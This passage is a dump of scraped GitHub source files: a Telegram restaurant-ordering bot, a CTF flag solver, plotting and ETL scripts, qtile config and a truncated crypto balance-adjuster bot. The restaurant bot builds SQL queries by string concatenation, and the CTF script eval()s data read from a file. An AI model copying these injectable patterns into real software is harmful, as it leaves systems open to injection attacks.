\", self.rendered_template)\n","repo_name":"armstrong/armstrong.core.arm_sections","sub_path":"tests/template_tags.py","file_name":"template_tags.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"16"}
+{"seq_id":"19604593572","text":"# -*- coding: utf-8 -*-\nimport sqlite3\nimport telebot\nimport config\nimport utils\n\nbot = telebot.TeleBot(config.token)\n\n# Возможно полезная херня с сортированным вложенным меню\n# # Создание сортированного списка разделов меню\n# #sorted_sections_list = sorted(config.menu_keyboard.items(), key=lambda t: t[0]) # Список тьюплов ключ-значение\n# sorted_sections_list = sorted(config.menu_keyboard, key=lambda t: t[0])\n# # Создание словаря клавиатур (клавиатура для каждого раздела)\n# menu_keyboard = [telebot.types.InlineKeyboardMarkup(row_width=2) for i in range(len(sorted_sections_list)+1)]\n# ## Создание сортированного словаря клавиатур (сортировка по названию раздела)\n# #menu_keyboard = OrderedDict(sorted(keyboards_dict.items(), key=lambda t: t[0]))\n# # Создание кнопок для каждой клавиатуры\n# for i, item in enumerate(sorted_sections_list, 1):\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i)+'_'+str(j))\n# for j, button_text in enumerate(config.menu_keyboard[item], 1))\n# menu_keyboard[i].add(*buttons)\n# # Добавление клавиатуры для разделов\n# buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_'+str(i))\n# for i, button_text in enumerate(config.menu_keyboard, 1))\n# menu_keyboard[0].add(*buttons)\n\n@bot.message_handler(commands=['start'])\ndef start(message):\n user_id = str(message.from_user.id)\n print('Бот запущен пользователем', user_id)\n utils.set_basket(user_id)\n bot.send_message(message.chat.id, config.main_menu, parse_mode='markdown', reply_markup=main_menu_keyboard)\n\n# ВОЗВРАТ В МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.back_button, content_types=['text'])\ndef back(message):\n print('Пользователь', message.from_user.id, 'вернулся в основное меню')\n bot.send_message(message.chat.id, config.main_menu, reply_markup=main_menu_keyboard)\n\n# ОПИСАНИЕ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[0], content_types=['text'])\ndef description(message):\n print('Пользователь', message.from_user.id, 'открыл \"Описание\"')\n bot.send_message(message.chat.id, config.description, reply_markup=back_keyboard)\n\n# ФОТОГРАФИИ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[1], content_types=['text'])\ndef photos(message):\n print('Пользователь', message.from_user.id, 'открыл \"Фотографии\"')\n bot.send_message(message.chat.id, config.photos, reply_markup=back_keyboard)\n\n# МЕНЮ\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[2], content_types=['text'])\ndef menu(message):\n print('Пользователь', message.from_user.id, 'открыл \"Меню\"')\n bot.send_message(message.chat.id, config.menu, reply_markup=menu_keyboard)\n\n@bot.callback_query_handler(func=lambda query: 'menu' in query.data)\ndef menu_section(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n section_number = int(query.data[5:])\n section = sorted_sections_list[section_number]\n print('Пользователь', user_id, 'открыл \"Раздел меню', section_number+1, '\" в \"Меню\"')\n\n bot.edit_message_text(section, query.message.chat.id, query.message.message_id)\n # ЗДЕСЬ НУЖНА ВЫГРУЗКА БЛЮД РАЗДЕЛА ИЗ БД\n for item in config.menu_keyboard[section]:\n bot.send_message(query.message.chat.id, item, reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '->' in query.data)\ndef amount_inc(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n item = query.data.split('_')[1]\n\n utils.add_to_basket(user_id, item)\n if 'b->' in query.data:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(query.message.chat.id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: '<-' in query.data)\ndef amount_dec(query):\n bot.answer_callback_query(query.id)\n\n user_id = str(query.from_user.id)\n chat_id = query.message.chat.id\n item = query.data.split('_')[1]\n\n utils.remove_amount(user_id, item)\n if not utils.item_amount(user_id, item):\n utils.del_from_basket(user_id, item)\n if 'b<-' in query.data:\n bot.delete_message(chat_id, query.message.message_id)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n elif 'b<-' in query.data:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item, basket=True))\n else:\n bot.edit_message_reply_markup(chat_id, query.message.message_id,\n reply_markup=amount_keyboard(user_id, item))\n\n@bot.callback_query_handler(func=lambda query: query.data == 'to_basket')\ndef to_basket(query):\n bot.answer_callback_query(query.id)\n basket(str(query.from_user.id), query.message.chat.id)\n\n# КОРЗИНА\n\ndef basket(user_id, chat_id):\n _basket = utils.get_basket(user_id)\n print('Пользователь', user_id, 'открыл \"Корзина\"')\n print(utils.get_basket(user_id))\n\n if not _basket:\n bot.send_message(chat_id, config.basket)\n bot.send_message(chat_id, config.empty_basket)\n else:\n bot.send_message(chat_id, config.basket, reply_markup=pay_keyboard)\n for item in _basket:\n bot.send_message(chat_id, item, reply_markup=amount_keyboard(user_id, item, basket=True))\n\n@bot.message_handler(func=lambda item: item.text == config.main_menu_keyboard[3], content_types=['text'])\ndef _basket(message):\n basket(str(message.from_user.id), message.chat.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'amount')\ndef item_amount(query):\n print(utils.get_basket(str(query.from_user.id)))\n bot.answer_callback_query(callback_query_id=query.id)\n\n@bot.callback_query_handler(func=lambda query: query.data[:6] == 'remove')\ndef remove(query):\n bot.answer_callback_query(callback_query_id=query.id)\n\n utils.del_from_basket(str(query.from_user.id), query.data[7:])\n bot.delete_message(chat_id=query.from_user.id, message_id=query.message.message_id)\n print(utils.get_basket(str(query.from_user.id)))\n if not utils.get_basket(str(query.from_user.id)):\n bot.send_message(chat_id=query.message.chat.id, text=config.empty_basket)\n\n# ОФОРМЛЕНИЕ ЗАКАЗА\n\n@bot.message_handler(func=lambda item: item.text == config.pay_button, content_types=['text'])\ndef payment(message):\n print('Пользователь', message.from_user.id, 'начал оформление заказа')\n pay_way_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_way_keyboard.add(telebot.types.KeyboardButton(config.pay_way[0]),\n telebot.types.KeyboardButton(config.pay_way[1]),\n telebot.types.KeyboardButton(config.back_button))\n bot.send_message(message.chat.id, config.choose_pay_way, reply_markup=pay_way_keyboard)\n\n# ЗДЕСЬ НУЖНА ВЫГРУЗКА ДАННЫХ ПО КАЖДОМУ ПРОДУКТУ ИЗ КОРЗИНЫ ИЗ БД\n@bot.message_handler(func=lambda item: item.text == config.pay_way[0], content_types=['text'])\ndef pay_newAPI(message):\n print('Пользователь', message.from_user.id, 'оформляет заказ через Telegram')\n bot.send_message(message.chat.id, config.view_basket, reply_markup=back_keyboard)\n msg = ''\n price = 0\n for item in utils.get_basket(str(message.from_user.id)):\n # НАДЕЮСЬ, ЧТО НУЖНО ДЕЛАТЬ ПОЯСНЕНИЙ НЕ ТРЕБУЕТСЯ, НО ЕСЛИ ЧТО, ЗВОНИ :-*\n amount = utils.item_amount(str(message.from_user.id), item)\n msg += ' - ' + item + ': ' + str(amount) + '\\n'\n price += amount * 10000\n prices = [telebot.types.LabeledPrice(config.check_num, price)]\n\n new_pay = telebot.types.InlineKeyboardMarkup(row_width=1)\n new_pay.add(telebot.types.InlineKeyboardButton(text=config.pay, pay=True))\n\n bot.send_invoice(chat_id=message.chat.id,\n title=config.check_num,\n description=msg,\n invoice_payload='invoice',\n provider_token=config.provider_token,\n start_parameter='invoice',\n currency='rub',\n prices=prices,\n need_name=True,\n need_phone_number=True,\n need_shipping_address=True,\n is_flexible=True,\n reply_markup=new_pay)\n\n@bot.shipping_query_handler(func=lambda query: True)\ndef shipping(shipping_query):\n shipping_options = []\n\n shipping_option = telebot.types.ShippingOption('delivery', 'Доставка курьером')\n shipping_option.add_price(telebot.types.LabeledPrice('Курьер', 10000))\n shipping_options.append(shipping_option)\n\n shipping_option = telebot.types.ShippingOption('sam', 'Самовывоз')\n shipping_option.add_price(telebot.types.LabeledPrice('Самовывоз', 0))\n shipping_options.append(shipping_option)\n\n bot.answer_shipping_query(shipping_query_id=shipping_query.id, ok=True, shipping_options=shipping_options,\n error_message=config.error_answer_query)\n\n\n@bot.pre_checkout_query_handler(func=lambda query: True)\ndef checkout(pre_checkout_query):\n bot.answer_pre_checkout_query(pre_checkout_query_id=pre_checkout_query.id,\n ok=True,\n error_message=config.error_pre_checkout)\n\n\n@bot.message_handler(content_types=['successful_payment'])\ndef got_payment(message):\n print('Пользователь', message.from_user.id, 'оформил заказ')\n for item in utils.get_basket(str(message.from_user.id)):\n utils.del_from_basket(str(message.from_user.id), item)\n bot.send_message(chat_id=message.chat.id,\n text=config.successful_payment.format(message.successful_payment.total_amount / 100,\n message.successful_payment.currency),\n parse_mode='Markdown', reply_markup=main_menu_keyboard)\n\nif __name__ == '__main__':\n\n main_menu_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=2)\n buttons = (telebot.types.KeyboardButton(text=button_text) for button_text in config.main_menu_keyboard)\n main_menu_keyboard.add(*buttons)\n\n back_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n back_keyboard.add(telebot.types.KeyboardButton(text=config.back_button))\n\n def amount_keyboard(user_id, item, basket=False):\n if basket:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='b<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='b->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.del_from_basket,\n callback_data='remove_' + item))\n elif utils.item_amount(user_id, item):\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n amount.add(telebot.types.InlineKeyboardButton(text=config.to_basket, callback_data='to_basket'))\n else:\n amount = telebot.types.InlineKeyboardMarkup()\n amount.row(telebot.types.InlineKeyboardButton(text='<-', callback_data='<-_' + item),\n telebot.types.InlineKeyboardButton(text=str(utils.item_amount(user_id, item)),\n callback_data='amount_' + item),\n telebot.types.InlineKeyboardButton(text='->', callback_data='->_' + item))\n\n return amount\n\n ### ЗДЕСЬ НУЖНА ВЫГРУЗКА РАЗДЕЛОВ ИЗ БД\n menu_keyboard = telebot.types.InlineKeyboardMarkup(row_width=2)\n sorted_sections_list = list(config.menu_keyboard)\n sorted_sections_list.sort()\n buttons = (telebot.types.InlineKeyboardButton(text=button_text, callback_data='menu_' + str(i))\n for i, button_text in enumerate(sorted_sections_list))\n menu_keyboard.add(*buttons)\n ###\n\n pay_keyboard = telebot.types.ReplyKeyboardMarkup(resize_keyboard=True, row_width=1)\n pay_keyboard.add(telebot.types.KeyboardButton(text=config.pay_button),\n telebot.types.KeyboardButton(text=config.back_button))\n\n hidden_keyboard = telebot.types.ReplyKeyboardRemove()\n\n\nclass sql:\n def tovars(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n company = \"KFC\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM '\"\"\" + str(company) + \"' ORDER BY Блюдо\")\n\n tovars = cursor.fetchall()\n conn.close()\n return tovars\n\n def kitchen(self):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n cursor.execute(\"\"\"\n SELECT Название\n FROM Кухня\n ORDER BY Название;\n \"\"\")\n kitchen = cursor.fetchall()\n conn.close()\n return kitchen\n def bludo_po_kuhne(self, kitchen_vibor):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n self.kitchen_vibor = \"Фастфуд\"\n cursor.execute(\"\"\"\n SELECT Блюдо\n FROM KFC\n WHERE Кухня = '\"\"\" + str(kitchen_vibor) + \"'\")\n kitchen_price = cursor.fetchall()\n conn.close()\n return kitchen_price\n def bludo_info(self, bludo):\n conn = sqlite3.connect(config.expl)\n cursor = conn.cursor()\n # Вывод всей информации о блюде\n self.bludo = \"Биггер\"\n cursor.execute(\"\"\"\n SELECT *\n FROM KFC\n WHERE Блюдо = '\"\"\" + str(bludo) + \"'\")\n info_food = cursor.fetchall()\n conn.close()\n return info_food\n\n\n\n\n bot.polling(none_stop=True)\n\n\n","repo_name":"eskidnov/restaurant_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":15636,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"26234542611","text":"#!/usr/bin/env python3.4\n\nimport re\n\nwith open('data','rt') as f:\n\tdata = f.read().strip().split('\\n')\ncount = {}\nfor d in data:\n\tcount[d] = d.count('a')\ncount_s = sorted(count.items(), key=lambda x:x[1])\n\nkey = [0]*47\ni = 0\nequ=list(map(lambda x:x[0],count_s))\nfor a in range(len(equ)):\n\tfor c in range(33,127):\n\t\tp = re.sub('a\\[\\d+\\]',str(c),equ[a])\n\t\tif eval(p):\n\t\t\tkey[i] = c\n\t\t\tequ = list(map(lambda x:x.replace('a[%d]'%i,str(key[i])),equ))\n\t\t\ti += 1\n\t\t\tbreak\nfkey = ''\nfor c in key:\n\tfkey += chr(c)\nprint(fkey)\n","repo_name":"qq53/ctf","sub_path":"simplexue/flag/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"4575254323","text":"import sys\nimport csv\nimport matplotlib.pyplot as plt\nfrom datetime import *\nfrom ggplot import *\nimport matplotlib.dates as dt\n\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\n\nNYPD = {}\nd = {}\nTLC = {}\nDPR = {}\ncount = 0\nnext(reader)\nfor i in reader:\n\tcount = d.setdefault(i[3], 0)\n\td[i[3]] = count + 1\n\ntopk = sorted(d.items(), key = lambda x:x[1], reverse = True)\nk = int(sys.argv[2])\ntopk = [x for x,y in topk]\ntopk = topk[:k] \nstart_date = datetime.strptime('06/01/2013 00:00:00 AM', '%m/%d/%Y %H:%M:%S %p')\nf.close()\nf = open(sys.argv[1])\nreader = csv.reader(f,delimiter = ',')\nnext(reader)\ncomplete = {}\nfor i in topk:\n\tcomplete[i] = {}\nfor i in reader:\n\tif i[3] in topk:\n\t\tdate = datetime.strptime(i[1],'%m/%d/%Y %H:%M:%S %p')\n\t\tdelta = date - start_date\n\t\tif int(delta.days) > 90:\n\t\t\tcontinue\n\t\tcount = complete[i[3]].setdefault(int(delta.days), 0)\n\t\tcomplete[i[3]][int(delta.days)] = count + 1\nlabels = complete.keys()\nXY = complete.values()\n\nfig,ax = plt.subplots()\nL = []\nfor i in xrange(0,91):\n\tL.append(start_date + timedelta(days = i))\ncolors = ['b','g','r','c','m','y','k']\nc = 0\nfor i in labels:\n\tc += 1\n\tL = []\n\tX = complete[i].keys()\n\tY = complete[i].values()\n\tfor j in xrange(0,len(X)):\n\t\tL.append(start_date + timedelta(days = j))\n\n\tplt.xticks(X, L, fontsize = 6)\n\tplt.plot(L, Y, colors[c%7], label = i)\n\nplt.legend(loc = 2)\nax.xaxis.set_major_formatter(dt.DateFormatter(\"%b %d %Y\"))\nax.xaxis.set_major_locator(dt.DayLocator((1,8,16,24)))\n\nplt.xlabel('Date')\nplt.ylabel('Number of Complaints')\nplt.show()\n\n\n","repo_name":"rybo449/Matplotlib-Visualizations","sub_path":"problem2_2.py","file_name":"problem2_2.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"8589869406","text":"from libqtile.config import Match\nfrom libqtile.layout.columns import Columns\nfrom libqtile.layout.floating import Floating\nfrom libqtile.layout.max import Max\nfrom libqtile.layout.xmonad import MonadWide\n\nfrom colors import OneDark as c\n\n_layout_theme = {\n \"border_width\": 4,\n \"margin\": 8,\n \"border_focus\": c.base0F,\n \"border_normal\": c.base00,\n}\nlayouts = [\n Columns(name=\"cols\", num_columns=3, **_layout_theme),\n Max(),\n # Try more layouts by unleashing below layouts.\n # Stack(num_stacks=2),\n # Bsp(),\n # Matrix(),\n # MonadTall(),\n MonadWide(name=\"wide\", **_layout_theme),\n # layout.RatioTile(),\n # layout.Tile(),\n # layout.TreeTab(),\n # layout.VerticalTile(),\n # layout.Zoomy(),\n]\n\nfloating_layout = Floating(\n float_rules=[\n # Run the utility of `xprop` to see the wm class and name of an X client.\n *Floating.default_float_rules,\n Match(wm_class=\"confirmreset\"), # gitk\n Match(wm_class=\"makebranch\"), # gitk\n Match(wm_class=\"maketag\"), # gitk\n Match(wm_class=\"ssh-askpass\"), # ssh-askpass\n Match(title=\"branchdialog\"), # gitk\n Match(title=\"pinentry\"), # GPG key password entry\n ]\n)\n","repo_name":"jamestrew/dotfiles","sub_path":"qtile/.config/qtile/_layouts.py","file_name":"_layouts.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40344168081","text":"\"\"\"\nThis file contains helper methods used throughout the phases of the ETL pipeline\n\"\"\"\n\nfrom datetime import datetime\nimport pandas as pd\nfrom constants import dataframe\n\ndef create_df(columns):\n \"\"\"\n Create a template dataframe based on columns provided\n\n Input : dictioary - { column name : column data type }\n Output : dataframe \n \"\"\"\n data_frame = pd.DataFrame(columns)\n return data_frame\n\ndef create_template_restaurants_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurants data\n (used for Q1 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.COUNTRY: pd.Series(dtype='str'),\n dataframe.CITY: pd.Series(dtype='str'),\n dataframe.USER_RATING_VOTES: pd.Series(dtype='str'),\n dataframe.USER_AGGREGATE_RATING: pd.Series(dtype='str'),\n dataframe.CUISINES: pd.Series(dtype='str'),\n dataframe.COUNTRY_ID: pd.Series(dtype='int'),\n dataframe.RATING_TEXT: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENTS: pd.Series(dtype='object'),\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str')\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef create_template_events_df():\n \"\"\"\n Create a template dataframe for the cleaned restaurant events data\n in Apr 2019 (used for Q2 CSV output)\n\n Input : None\n Output : dataframe \n \"\"\"\n columns = {\n dataframe.EVENT_ID: pd.Series(dtype='str'),\n dataframe.RESTAURANT_ID: pd.Series(dtype='int'),\n dataframe.RESTAURANT_NAME: pd.Series(dtype='str'),\n dataframe.PHOTO_URL: pd.Series(dtype='str'),\n dataframe.EVENT_TITLE: pd.Series(dtype='str'),\n dataframe.EVENT_START_DATE: pd.Series(dtype='str'),\n dataframe.EVENT_END_DATE: pd.Series(dtype='str'),\n }\n\n data_frame = create_df(columns)\n return data_frame\n\ndef map_country_code_to_country_name(d_countries, country_code):\n \"\"\"\n Returns the country name associated with the provided country code\n based on the countries dictionary of { country code : country name }\n If country code does not exist, return NA\n\n Input : dictionary, string\n Output : string \n \"\"\"\n if country_code in d_countries:\n return d_countries[country_code]\n return dataframe.NA_VALUE\n\ndef event_occurs_within_dates(\n event_start,\n event_end,\n fixed_start,\n fixed_end\n):\n \"\"\"\n Check whether an event occurs within a date range \n\n Input : string, string, string, string\n Output : boolean \n \"\"\"\n return (\n event_start >= datetime.strptime(fixed_start, '%Y-%m-%d')\n and event_end <= datetime.strptime(fixed_end, '%Y-%m-%d')\n )\n\n\ndef replace_na_cells(data_frame, replacement_str):\n \"\"\"\n Replace NaN cells in the dataframe with a provided\n replacement string\n\n Input : dataframe, string \n Output : dataframe \n \"\"\"\n data_frame = data_frame.fillna(replacement_str)\n return data_frame\n\ndef extract_photo_urls(event):\n \"\"\"\n Obtain photo URLs for all photos of each event.\n If there's multiple photo URLs, they are separated by\n a comma delimiter\n\n Input : list\n Output : string\n \"\"\"\n if 'photos' in event:\n photo_urls = list(map(lambda photo: photo['photo']['url'], event['photos']))\n photo_urls_string = \",\".join(photo_urls)\n return photo_urls_string\n return dataframe.NA_VALUE\n","repo_name":"ongyongen/de","sub_path":"etl_pipeline/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"17917237372","text":"import sys\nimport ccxt\nimport time\nimport signal\nimport re\nimport os\nimport uuid\nimport logging\nfrom threading import Thread, Lock\nimport argparse\nsignal.signal(signal.SIGINT, lambda x,y: os._exit(0))\nfrom flask_socketio import SocketIO, emit\nfrom datetime import datetime\nfrom decimal import Decimal\ndir_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = dir_path+'/../libs'\nsys.path.append(lib_path)\nfrom exchange_lib import *\nfrom common import log, socket_emit\n\n\ndef arg_parser(web_inputs=None):\n args_dict = web_inputs\n if not web_inputs:\n parser = argparse.ArgumentParser(description='Nico bot')\n parser.add_argument('ex_and_coin', type=str, help='Exchanges and coins')\n parser.add_argument('fees', type=str, help='Order fees for the coin and target coin')\n parser.add_argument('target_coin', type=str, help='Target coin')\n parser.add_argument('buyback_exchange', type=str, help='Buyback exchange')\n parser.add_argument('-s', '--threshold', type=str, default='0', help='threshold to adjust (default 0)')\n parser.add_argument('-i', '--interval', type=str, default='1', help='Checking interval in minute (default 1m)')\n parser.add_argument('-b', '--buyback', type=bool, nargs='?', const=True, default=False, help='Buyback')\n args = parser.parse_args()\n args_dict = vars(args)\n # end if\n\n ex_and_coin_list = args_dict.get('ex_and_coin')\n fees = args_dict.get('fees')\n ex_and_coin_fee_dict = {}\n kra_coins = []\n bin_coins = []\n \n for coin, fee in zip(ex_and_coin_list.split('-'), fees.split('-')):\n fee = Decimal(fee)\n ex_id = coin[:3]\n coin_fee_list = ex_and_coin_fee_dict.get(ex_id)\n if not coin_fee_list:\n coin_fee_list = []\n coin_fee_list.append((coin[3:], fee))\n ex_and_coin_fee_dict.update({ex_id: coin_fee_list})\n\n target_coin = args_dict.get('target_coin')\n buyback_exchange = args_dict.get('buyback_exchange')\n checking_interval = float(args_dict.get('interval'))\n threshold = Decimal(args_dict.get('threshold'))\n buyback = args_dict.get('buyback')\n if buyback == 'False':\n buyback = False\n elif buyback == 'True':\n buyback = True\n\n return {\n 'ex_and_coin_fee': ex_and_coin_fee_dict,\n 'checking_interval': checking_interval,\n 'target_coin': target_coin,\n 'buyback_exchange': buyback_exchange,\n 'threshold': threshold,\n 'buyback': buyback,\n 'account_sell_buy': args_dict['account_sell_buy'],\n 'account_buy_sell': args_dict['account_buy_sell'],\n 'own_username': args_dict['own_username']\n }\n\n\nclass balance_adjuster_bot():\n def __init__(self):\n self._exchanges = {}\n self._adjuster_coins = {}\n self._adjuster_coins_in_total = {}\n self._target_coin = ''\n self._buyback_exchange = ''\n self._threshold = 0\n self._buyback = True\n self._args = None\n self._terminate = False\n self._socketio = None\n self._channel_uuid = ''\n self._socketdata = {}\n self._logger = logging.getLogger('BalanceAdjusterBot')\n\n def terminate(self):\n self._terminate = True\n\n def _config_logger(self):\n self._logger.setLevel(logging.DEBUG)\n script_path = os.path.dirname(os.path.realpath(__file__))\n file_name = 'balance_adjuster_cmd_' + datetime.now().strftime('%Y-%m-%dT%H-%M-%S')\n if self._socketio:\n file_name = 'balance_adjuster_web_' + self._channel_uuid\n # create file handler which logs even debug messages\n fh = logging.FileHandler(script_path + '/../web/logs/'+ str(file_name) + '.log')\n fh.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n self._logger.addHandler(fh)\n\n def _log(self, data='', severity='info'):\n log(data, self._logger, self._socketio, self._channel_uuid, log_severity=severity)\n\n def _get_target_coin_amount_from_coin(self, coin_fee_pair):\n # Check if this coin is direct coin to target coin\n target_coin_amount = Decimal(0)\n buyback_order_amount = Decimal(0)\n order_info = ()\n if coin_fee_pair[-1] != None:\n coin, fee, pair = coin_fee_pair\n if coin == 'USD':\n exchange_id = 'KRA'\n else:\n exchange_id = pair[:3]\n pair = pair[3:]\n buyback_order_side = ''\n buyback_order_amount = Decimal(0)\n coin_position_in_pair = 1 if pair.find(coin) == 0 else 2\n order_book = self._exchanges.get(exchange_id).fetch_order_book(pair, 1)\n pair_price = 0\n coin_amount = self._adjuster_coins_in_total[coin_fee_pair][2]\n # Return None if price isn't initiated yet\n if order_book == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount * pair_price * (1 + fee/100)\n elif coin_amount > 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount * pair_price * (1 - fee/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side = 'sell'\n pair_price = Decimal(str(order_book[0][0]))\n target_coin_amount = coin_amount / pair_price * (1 + fee/100)\n buyback_order_amount = abs(target_coin_amount)\n elif coin_amount > 0:\n buyback_order_side = 'buy'\n pair_price = Decimal(str(order_book[1][0]))\n target_coin_amount = coin_amount / pair_price * (1 - fee/100)\n buyback_order_amount = target_coin_amount\n order_info = (pair, buyback_order_side, buyback_order_amount, pair_price)\n # TODO will adapt later to new requirement. Indirect coin, hava intermediate coin\n else:\n coin, fees, _ = coin_fee_pair\n pair1, fee1 = fees[0]\n buyback_order_side1 = ''\n buyback_order_amount1 = Decimal(0)\n coin_position_in_pair = 1 if pair1.find(coin) == 0 else 2\n order_book1 = self._exchanges.get(exchange).fetch_order_book(pair1, 1)\n pair1_price = Decimal(0)\n coin_amount = self._adjuster_coins[exchange][coin_fee_pair][2]\n intermediate_coin_amount = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book1 == (None, None):\n return False, Decimal(0), ()\n\n if coin_position_in_pair == 1:\n buyback_order_amount1 = abs(coin_amount)\n if coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 + fee1/100)\n elif coin_amount > 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n intermediate_coin_amount = coin_amount * pair1_price * (1 - fee1/100)\n elif coin_position_in_pair == 2:\n if coin_amount < 0:\n buyback_order_side1 = 'sell'\n pair1_price = Decimal(str(order_book1[0][0]))\n intermediate_coin_amount = coin_amount / pair1_price * (1 + fee1/100)\n buyback_order_amount1 = abs(intermediate_coin_amount)\n elif coin_amount > 0:\n buyback_order_side1 = 'buy'\n pair1_price = Decimal(str(order_book1[1][0]))\n intermediate_coin_amount = coin_amount / pair1_price * (1 - fee1/100)\n buyback_order_amount1 = intermediate_coin_amount\n\n pair2, fee2 = fees[1]\n buyback_order_side2 = ''\n buyback_order_amount2 = Decimal(0)\n target_coin_position_in_pair = 1 if pair2.find(self._target_coin) == 0 else 2\n order_book2 = self._exchanges.get(exchange).fetch_order_book(pair2, 1)\n pair2_price = Decimal(0)\n # Return None if price isn't initiated yet\n if order_book2 == (None, None):\n return False, Decimal(0), ()\n\n if target_coin_position_in_pair == 1:\n if intermediate_coin_amount < 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 + fee2/100)\n buyback_order_amount2 = abs(target_coin_amount)\n elif intermediate_coin_amount > 0:\n pair2_price = Decimal(str(order_book2[1][0]))\n buyback_order_side2 = 'buy'\n target_coin_amount = intermediate_coin_amount / pair2_price * (1 - fee2/100)\n buyback_order_amount2 = target_coin_amount\n elif target_coin_position_in_pair == 2:\n buyback_order_amount2 = abs(intermediate_coin_amount)\n if intermediate_coin_amount < 0:\n buyback_order_side1 = 'buy'\n pair2_price = Decimal(str(order_book2[1][0]))\n target_coin_amount = intermediate_coin_amount * pair2_price * (1 + fee2/100)\n elif intermediate_coin_amount > 0:\n buyback_order_side2 = 'sell'\n pair2_price = Decimal(str(order_book2[0][0]))\n target_coin_amount = intermediate_coin_amount * pair2_price * (1 - fee2/100)\n order_info = ((pair1, buyback_order_side1, buyback_order_amount1, pair1_price), (pair2, buyback_order_side2, buyback_order_amount2, pair2_price))\n return True, target_coin_amount, order_info\n\n \"\"\"\n Check for all coin adjuster if they can be buyback and still have profit \n \"\"\"\n def _adjuster_check(self):\n accumulate_amount_of_target_coin = Decimal(0)\n for coin_fee_pair, value in self._adjuster_coins_in_total.items():\n if coin_fee_pair[0] != self._target_coin:\n status, target_coin_buyback_amount, buyback_order_input = self._get_target_coin_amount_from_coin(coin_fee_pair)\n #self._log('{} {} {}'.format(coin_fee_pair[0], target_coin_buyback_amount, buyback_order_input))\n if not status:\n 